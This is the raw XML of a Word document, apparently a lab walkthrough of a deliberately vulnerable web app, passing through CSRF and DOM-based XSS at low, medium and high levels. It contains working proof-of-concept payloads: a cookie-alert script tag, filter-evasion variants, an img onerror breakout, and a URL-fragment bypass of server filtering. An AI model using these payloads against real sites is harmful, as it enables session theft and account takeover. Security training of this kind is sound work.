    <w:p w14:paraId="7CFB2322" w14:textId="497FC211" w:rsidR="0068665A" w:rsidRDefault="0068665A" w:rsidP="00D7708B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4544E39D" w14:textId="7EDCC4EA" w:rsidR="0068665A" w:rsidRDefault="0068665A" w:rsidP="00D7708B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="767B3EC3" w14:textId="7123C57C" w:rsidR="0068665A" w:rsidRDefault="0068665A" w:rsidP="00D7708B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="045C0FA0" w14:textId="5AD01E0D" w:rsidR="0068665A" w:rsidRDefault="0068665A" w:rsidP="00D7708B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7D1DCA03" w14:textId="7ADBC781" w:rsidR="0068665A" w:rsidRDefault="0068665A" w:rsidP="00D7708B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5C8187CA" w14:textId="704327D2" w:rsidR="0068665A" w:rsidRDefault="0068665A" w:rsidP="00D7708B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5B5BA284" w14:textId="65768C46" w:rsidR="0068665A" w:rsidRDefault="0068665A" w:rsidP="00D7708B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0FF04FF8" w14:textId="11389E36" w:rsidR="0068665A" w:rsidRDefault="0068665A" w:rsidP="00D7708B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="441A2B2C" w14:textId="77777777" w:rsidR="0068665A" w:rsidRPr="00A73FE2" w:rsidRDefault="0068665A"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42B83D3B" w:rsidR="00F04227" w:rsidRPr="00A73FE2" w:rsidRDefault="00F04227" w:rsidP="005325E0">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="22" w:name="_Toc114777190"/>
      <w:r w:rsidRPr="00A73FE2">
        <w:t>Command Injection</w:t>
      </w:r>
      <w:bookmarkEnd w:id="22"/>
      <w:r w:rsidR="00E67820">
        <w:t xml:space="preserve"> (2.1)</w:t>
      </w:r>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5325E0">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="23" w:name="_Toc114777191"/>
      <w:r w:rsidRPr="00A73FE2">
        <w:t>Command Injection – Low level</w:t>
      </w:r>
      <w:bookmarkEnd w:id="23"/>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5325E0">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="24" w:name="_Toc114777192"/>
      <w:r w:rsidRPr="00A73FE2">
        <w:t>Command Injection – Medium level</w:t>
      </w:r>
      <w:bookmarkEnd w:id="24"/>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000000" w:rsidP="00D7708B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId79"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5B629EC9" w:rsidR="00F31C59"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71727662" w14:textId="72735590" w:rsidR="00B44618" w:rsidRDefault="00B44618" w:rsidP="00D7708B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4DA66E2C" w14:textId="783D1129" w:rsidR="00B44618" w:rsidRDefault="00F060E3" w:rsidP="00B44618">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="25" w:name="_Toc114777193"/>
      <w:r>
        <w:t>CSRF (4.1)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="25"/>
    </w:p>
    <w:p w14:paraId="59C83F37" w14:textId="2FAB6D82" w:rsidR="00F060E3" w:rsidRDefault="00F060E3" w:rsidP="00F060E3">
      <w:r w:rsidRPr="00F060E3">
        <w:t>A Cross Site Request Forgery is</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> forcing the users to do things without their knowledge. For instance, they could click on normal website and their cookie was suddenly stolen. Or being asked to log in to Facebook but the attacker is receiving the information on </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>beEF</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E94E11A" w14:textId="6108ECD9" w:rsidR="00F060E3" w:rsidRDefault="00F060E3" w:rsidP="00F060E3">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="26" w:name="_Toc114777194"/>
      <w:r>
        <w:t>CSRF – Low Level</w:t>
      </w:r>
      <w:bookmarkEnd w:id="26"/>
    </w:p>
    <w:p w14:paraId="2E732B28" w14:textId="58D9F79A" w:rsidR="00F060E3" w:rsidRDefault="004A6BEC" w:rsidP="00F060E3">
      <w:r>
        <w:t>The attacker can trick the user to click on a link that has a parameter like:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CFCA81C" w14:textId="4F5FC669" w:rsidR="004A6BEC" w:rsidRDefault="004A6BEC" w:rsidP="00F060E3">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004A6BEC">
        <w:rPr>
          <w:highlight w:val="darkGray"/>
        </w:rPr>
        <w:t>password_new</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004A6BEC">
        <w:rPr>
          <w:highlight w:val="darkGray"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004A6BEC">
        <w:rPr>
          <w:highlight w:val="darkGray"/>
        </w:rPr>
        <w:t>hacker&amp;password_conf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004A6BEC">
        <w:rPr>
          <w:highlight w:val="darkGray"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004A6BEC">
        <w:rPr>
          <w:highlight w:val="darkGray"/>
        </w:rPr>
        <w:t>hacker&amp;Change</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004A6BEC">
        <w:rPr>
          <w:highlight w:val="darkGray"/>
        </w:rPr>
        <w:t>=Change</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="284B991D" w14:textId="4485BC88" w:rsidR="004A6BEC" w:rsidRDefault="004A6BEC" w:rsidP="00F060E3">
      <w:r>
        <w:t xml:space="preserve">Then the attacker can fake a confirmation page where behind the </w:t>
      </w:r>
      <w:r w:rsidR="007E69FF">
        <w:t>scenes</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> they forced the user to change the password to one only the attacker knows.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="599E8479" w14:textId="314CF258" w:rsidR="007E69FF" w:rsidRDefault="007E69FF" w:rsidP="00F060E3"/>
    <w:p w14:paraId="6FF9F262" w14:textId="62D48054" w:rsidR="007E69FF" w:rsidRDefault="007E69FF" w:rsidP="00F060E3"/>
    <w:p w14:paraId="0D4BF18F" w14:textId="357EA2AA" w:rsidR="007E69FF" w:rsidRDefault="007E69FF" w:rsidP="00F060E3"/>
    <w:p w14:paraId="56331193" w14:textId="003608A0" w:rsidR="007E69FF" w:rsidRDefault="007E69FF" w:rsidP="00F060E3"/>
    <w:p w14:paraId="33F59BE5" w14:textId="706A7BC1" w:rsidR="007E69FF" w:rsidRDefault="007E69FF" w:rsidP="00F060E3"/>
    <w:p w14:paraId="401A81FD" w14:textId="53F9AFE2" w:rsidR="007E69FF" w:rsidRDefault="007E69FF" w:rsidP="00F060E3"/>
    <w:p w14:paraId="2CDD5D4D" w14:textId="4351118A" w:rsidR="007E69FF" w:rsidRDefault="007E69FF" w:rsidP="00F060E3"/>
    <w:p w14:paraId="10B391DC" w14:textId="3C75F637" w:rsidR="007E69FF" w:rsidRDefault="007E69FF" w:rsidP="007E69FF">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="27" w:name="_Toc114777195"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">XSS </w:t>
      </w:r>
      <w:r w:rsidR="00075BF0">
        <w:t xml:space="preserve">DOM </w:t>
      </w:r>
      <w:r>
        <w:t>(4.1)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="27"/>
    </w:p>
    <w:p w14:paraId="593FC31D" w14:textId="0AE29FA4" w:rsidR="007E69FF" w:rsidRDefault="007E69FF" w:rsidP="004C5424">
      <w:r>
        <w:t>The Cross-Site Scripting in a method to inject JavaScript codes onto the user’s website.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33131DB0" w14:textId="5EE01318" w:rsidR="004C5424" w:rsidRDefault="004C5424" w:rsidP="004C5424">
      <w:r>
        <w:t xml:space="preserve">It happens when the attacker modifies the DOM variable in the victim’s browser. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5549610D" w14:textId="5F125E75" w:rsidR="00075BF0" w:rsidRDefault="00075BF0" w:rsidP="00075BF0">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="28" w:name="_Toc114777196"/>
      <w:r>
        <w:t>XSS</w:t>
      </w:r>
      <w:r w:rsidR="006D2153">
        <w:t xml:space="preserve"> DOM</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> – Low Level</w:t>
      </w:r>
      <w:bookmarkEnd w:id="28"/>
    </w:p>
    <w:p w14:paraId="6C9E8937" w14:textId="20A6C1B1" w:rsidR="00075BF0" w:rsidRDefault="00075BF0" w:rsidP="00075BF0">
      <w:r>
        <w:t xml:space="preserve">The </w:t>
      </w:r>
      <w:r w:rsidR="0087543D">
        <w:t>website asks us to choose a language. After submitting, we notice that the URL look like this:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="386168AF" w14:textId="663F495A" w:rsidR="0087543D" w:rsidRPr="00075BF0" w:rsidRDefault="0087543D" w:rsidP="00075BF0">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="24EDE5E0" wp14:editId="0763C943">
            <wp:extent cx="5731510" cy="9810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110CB5E9" w14:textId="77777777" w:rsidR="00F060E3" w:rsidRPr="00F060E3" w:rsidRDefault="00F060E3" w:rsidP="00F060E3"/>
    <w:p w14:paraId="3CD39C1A" w14:textId="40C91DB4" w:rsidR="00B44618" w:rsidRDefault="0087543D" w:rsidP="0087543D">
      <w:r>
        <w:t>And the form looks like this:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E8566B7" w14:textId="3CB2F34F" w:rsidR="0087543D" w:rsidRDefault="0087543D" w:rsidP="0087543D">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="382CE2EF" wp14:editId="0435B98A">
            <wp:extent cx="5731510" cy="3078480"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="64" name="Picture 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chat or text messag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206DFED" w14:textId="1CC95DF1" w:rsidR="0087543D" w:rsidRDefault="0087543D" w:rsidP="0087543D"/>
    <w:p w14:paraId="7425AE08" w14:textId="34D4A359" w:rsidR="0087543D" w:rsidRDefault="0087543D" w:rsidP="0087543D">
      <w:r>
        <w:t xml:space="preserve">We can inject a script tag between the option tag, and it would be executed. How to inject the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>js</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> code inside that tag?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C8B655F" w14:textId="7E20B81D" w:rsidR="0087543D" w:rsidRDefault="0087543D" w:rsidP="0087543D">
      <w:r>
        <w:t xml:space="preserve">Immediately after the selected language in the URL, we can add </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48442054" w14:textId="6B25721F" w:rsidR="0087543D" w:rsidRDefault="0087543D" w:rsidP="0087543D">
      <w:r w:rsidRPr="008F1777">
        <w:rPr>
          <w:highlight w:val="darkGray"/>
        </w:rPr>
        <w:t>&lt;script&gt;alert(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="008F1777" w:rsidRPr="008F1777">
        <w:rPr>
          <w:highlight w:val="darkGray"/>
        </w:rPr>
        <w:t>document.cookie</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="008F1777">
        <w:rPr>
          <w:highlight w:val="darkGray"/>
        </w:rPr>
        <w:t>)&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16980B59" w14:textId="5D8C7C33" w:rsidR="008F1777" w:rsidRDefault="008F1777" w:rsidP="0087543D">
      <w:r>
        <w:t>This code would be executed since the website took it without any security.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7185A32A" w14:textId="454A9293" w:rsidR="008F1777" w:rsidRDefault="008F1777" w:rsidP="0087543D">
      <w:r>
        <w:t xml:space="preserve">We can do other things between the script </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>tag,</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> it depends on the attacker and the purpose of the attack.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58E5E5D8" w14:textId="06AF8483" w:rsidR="008F1777" w:rsidRDefault="008F1777" w:rsidP="0087543D"/>
    <w:p w14:paraId="167B3E6E" w14:textId="1116B537" w:rsidR="008F1777" w:rsidRDefault="008F1777" w:rsidP="0087543D"/>
    <w:p w14:paraId="48597424" w14:textId="7D962BD7" w:rsidR="008F1777" w:rsidRDefault="008F1777" w:rsidP="008F1777">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="29" w:name="_Toc114777197"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>XSS</w:t>
      </w:r>
      <w:r w:rsidR="006D2153">
        <w:t xml:space="preserve"> DOM</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> – Medium Level</w:t>
      </w:r>
      <w:bookmarkEnd w:id="29"/>
    </w:p>
    <w:p w14:paraId="6D2AA895" w14:textId="044F6CFE" w:rsidR="008F1777" w:rsidRDefault="008F1777" w:rsidP="008F1777">
      <w:r>
        <w:t>When trying the previous method here, it does not work. Why?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7614F64E" w14:textId="4E2A92F0" w:rsidR="008F1777" w:rsidRDefault="008F1777" w:rsidP="008F1777">
      <w:r>
        <w:t xml:space="preserve">The developer knew about our trick and decided to put the word </w:t>
      </w:r>
      <w:r w:rsidR="00782BA9">
        <w:t>‘</w:t>
      </w:r>
      <w:r>
        <w:t>script</w:t>
      </w:r>
      <w:r w:rsidR="00782BA9">
        <w:t>’ on the blacklist.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5253E896" w14:textId="2F96E2D8" w:rsidR="00782BA9" w:rsidRDefault="00782BA9" w:rsidP="008F1777">
      <w:r>
        <w:t>What can we do?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A893AA1" w14:textId="4E89034C" w:rsidR="00782BA9" w:rsidRDefault="00782BA9" w:rsidP="008F1777">
      <w:r>
        <w:t>We can try one of these methods</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27A7F228" w14:textId="5EFA2F18" w:rsidR="00782BA9" w:rsidRPr="00782BA9" w:rsidRDefault="00782BA9" w:rsidP="008F1777">
      <w:pPr>
        <w:rPr>
          <w:highlight w:val="darkGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00782BA9">
        <w:rPr>
          <w:highlight w:val="darkGray"/>
        </w:rPr>
        <w:t>&lt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00782BA9">
        <w:rPr>
          <w:highlight w:val="darkGray"/>
        </w:rPr>
        <w:t>sscriptcript</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00782BA9">
        <w:rPr>
          <w:highlight w:val="darkGray"/>
        </w:rPr>
        <w:t>&gt;alert(‘</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00782BA9">
        <w:rPr>
          <w:highlight w:val="darkGray"/>
        </w:rPr>
        <w:t>xss</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00782BA9">
        <w:rPr>
          <w:highlight w:val="darkGray"/>
        </w:rPr>
        <w:t>’)&lt;</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00782BA9">
        <w:rPr>
          <w:highlight w:val="darkGray"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00782BA9">
        <w:rPr>
          <w:highlight w:val="darkGray"/>
        </w:rPr>
        <w:t>sscriptcript</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00782BA9">
        <w:rPr>
          <w:highlight w:val="darkGray"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CE96D3E" w14:textId="3EED9FDC" w:rsidR="00782BA9" w:rsidRDefault="00782BA9" w:rsidP="008F1777">
      <w:r w:rsidRPr="00782BA9">
        <w:rPr>
          <w:highlight w:val="darkGray"/>
        </w:rPr>
        <w:t>&lt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00782BA9">
        <w:rPr>
          <w:highlight w:val="darkGray"/>
        </w:rPr>
        <w:t>img</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00782BA9">
        <w:rPr>
          <w:highlight w:val="darkGray"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00782BA9">
        <w:rPr>
          <w:highlight w:val="darkGray"/>
        </w:rPr>
        <w:t>src</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00782BA9">
        <w:rPr>
          <w:highlight w:val="darkGray"/>
        </w:rPr>
        <w:t xml:space="preserve">=a </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00782BA9">
        <w:rPr>
          <w:highlight w:val="darkGray"/>
        </w:rPr>
        <w:t>onerror</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00782BA9">
        <w:rPr>
          <w:highlight w:val="darkGray"/>
        </w:rPr>
        <w:t>=alert(‘</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00782BA9">
        <w:rPr>
          <w:highlight w:val="darkGray"/>
        </w:rPr>
        <w:t>xss</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00782BA9">
        <w:rPr>
          <w:highlight w:val="darkGray"/>
        </w:rPr>
        <w:t>’)&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D1A833A" w14:textId="7CC7A7C3" w:rsidR="00782BA9" w:rsidRDefault="00782BA9" w:rsidP="008F1777">
      <w:r>
        <w:t>The first one did not work. Neither the second one. However, the second one did not work because an image tag cannot be inside another tag. We should close the option &amp; the select tags first, then we can add the image tag.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="127BD01D" w14:textId="16C9A48A" w:rsidR="00782BA9" w:rsidRDefault="00782BA9" w:rsidP="008F1777">
      <w:r>
        <w:t>It would look like this:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50B9FD67" w14:textId="63522B68" w:rsidR="00782BA9" w:rsidRDefault="00782BA9" w:rsidP="008F1777">
      <w:r>
        <w:t>&lt;/option&gt;&lt;/select&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00782BA9">
        <w:t>&lt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00782BA9">
        <w:t>img</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00782BA9">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00782BA9">
        <w:t>src</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00782BA9">
        <w:t xml:space="preserve">=a </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00782BA9">
        <w:t>onerror</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00782BA9">
        <w:t>=alert(‘</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00782BA9">
        <w:t>xss</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00782BA9">
        <w:t>’)&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6258282B" w14:textId="066E849D" w:rsidR="00782BA9" w:rsidRDefault="00782BA9" w:rsidP="008F1777">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="58E2310F" wp14:editId="310A2321">
            <wp:extent cx="5731510" cy="3176270"/>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72F776D" w14:textId="77777777" w:rsidR="00782BA9" w:rsidRDefault="00782BA9" w:rsidP="008F1777"/>
    <w:p w14:paraId="148F0BD0" w14:textId="77777777" w:rsidR="00782BA9" w:rsidRPr="008F1777" w:rsidRDefault="00782BA9" w:rsidP="008F1777"/>
    <w:p w14:paraId="06097FA1" w14:textId="538D45E7" w:rsidR="00FD42C1" w:rsidRDefault="00FD42C1" w:rsidP="00FD42C1">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="30" w:name="_Toc114777198"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>XSS</w:t>
      </w:r>
      <w:r w:rsidR="006D2153">
        <w:t xml:space="preserve"> DOM</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> – High Level</w:t>
      </w:r>
      <w:bookmarkEnd w:id="30"/>
    </w:p>
    <w:p w14:paraId="2F32BBC0" w14:textId="0CEFA848" w:rsidR="008F1777" w:rsidRDefault="00FD42C1" w:rsidP="0087543D">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="611791C5" wp14:editId="6EDA289C">
            <wp:extent cx="5731510" cy="354838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14470F1A" w14:textId="77777777" w:rsidR="008F1777" w:rsidRDefault="008F1777" w:rsidP="0087543D"/>
    <w:p w14:paraId="5BBB1840" w14:textId="08E63F8B" w:rsidR="0087543D" w:rsidRDefault="00FD42C1" w:rsidP="0087543D">
      <w:r>
        <w:t xml:space="preserve">The PHP code is written to secure the website. We can force the website to take our code through hiding the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>js</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> code from the server. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04205C37" w14:textId="0F8B6B22" w:rsidR="00FD42C1" w:rsidRDefault="00FD42C1" w:rsidP="0087543D">
      <w:r>
        <w:t>We should not allow the website to send our script tag to the server because that would reject our request. We should only send the selected language to the server and after the word we could add # to prevent the website to send what comes after to the server.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7299B670" w14:textId="092561B1" w:rsidR="00FD42C1" w:rsidRDefault="002673D9" w:rsidP="0087543D">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7A218862" wp14:editId="34BF55A4">
            <wp:extent cx="5731510" cy="3234690"/>
            <wp:effectExtent l="0" t="0" r="0" b="381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866E8D3" w14:textId="7EFEC9B4" w:rsidR="0087543D" w:rsidRDefault="0087543D" w:rsidP="0087543D"/>
    <w:p w14:paraId="407E8A3F" w14:textId="6D2F4F4E" w:rsidR="00B05ED2" w:rsidRDefault="00B05ED2" w:rsidP="00B05ED2">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="31" w:name="_Toc114777199"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>XSS Stored</w:t>
      </w:r>
      <w:r w:rsidR="003447C4">
        <w:t xml:space="preserve"> &amp; Reflected</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (4.1)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="31"/>
    </w:p>
    <w:p w14:paraId="0AFA3B3D" w14:textId="3CBF498F" w:rsidR="001022E9" w:rsidRDefault="001022E9" w:rsidP="00B05ED2"/>
    <w:p w14:paraId="1175C7D9" w14:textId="5AAFB143" w:rsidR="001022E9" w:rsidRDefault="001022E9" w:rsidP="00B05ED2">
      <w:r>
        <w:t>XSS Stored is injecting code to the database that will remain in there permanently. The website developer would need to reset the database or remove the code manually to clean the website from suspicious activities.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="213037A0" w14:textId="3866404C" w:rsidR="005F0A5C" w:rsidRDefault="005F0A5C" w:rsidP="00B05ED2">
      <w:r>
        <w:t xml:space="preserve">XSS Stored is </w:t>
      </w:r>
      <w:r w:rsidRPr="005F0A5C">
        <w:t>persistent</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> as it stays in the database until someone manually removes it.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AB5F025" w14:textId="7A84FB75" w:rsidR="006D2153" w:rsidRDefault="006D2153" w:rsidP="00B05ED2">
      <w:r>
        <w:t xml:space="preserve">XSS Reflected is </w:t>
      </w:r>
      <w:r w:rsidR="005F0A5C">
        <w:t>when the website receives HTTP data and includes that data within the response which may cause damage.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11022AAA" w14:textId="76C84DAF" w:rsidR="001022E9" w:rsidRDefault="001022E9" w:rsidP="001022E9">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="32" w:name="_Toc114777200"/>
      <w:r>
        <w:t>XSS Stored</w:t>
      </w:r>
      <w:r w:rsidR="003447C4">
        <w:t xml:space="preserve"> &amp; Reflected</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> – Low Level</w:t>
      </w:r>
      <w:bookmarkEnd w:id="32"/>
    </w:p>
    <w:p w14:paraId="4F9F5630" w14:textId="27A86E7C" w:rsidR="001022E9" w:rsidRDefault="001022E9" w:rsidP="001022E9">
      <w:r>
        <w:t xml:space="preserve">The objective is to redirect the users to another page immediately after loading the </w:t>
      </w:r>
      <w:r w:rsidR="00F45DAB">
        <w:t>website.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32889EF0" w14:textId="51528002" w:rsidR="00F45DAB" w:rsidRDefault="00F45DAB" w:rsidP="001022E9">
      <w:r>
        <w:t xml:space="preserve">For redirecting, I could use a </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
